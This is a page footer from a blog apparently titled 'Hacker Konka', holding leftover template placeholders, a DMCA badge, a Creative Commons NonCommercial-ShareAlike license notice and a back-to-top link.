%%v_I_RESO%% %%v_RESO%% %%v_I_CLR%% %%v_CLR%%
DMCA.com
hackerkonka.blogspot.in Webutation Creative Commons License
Hacker Konka by Konka Karthik is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Back To Top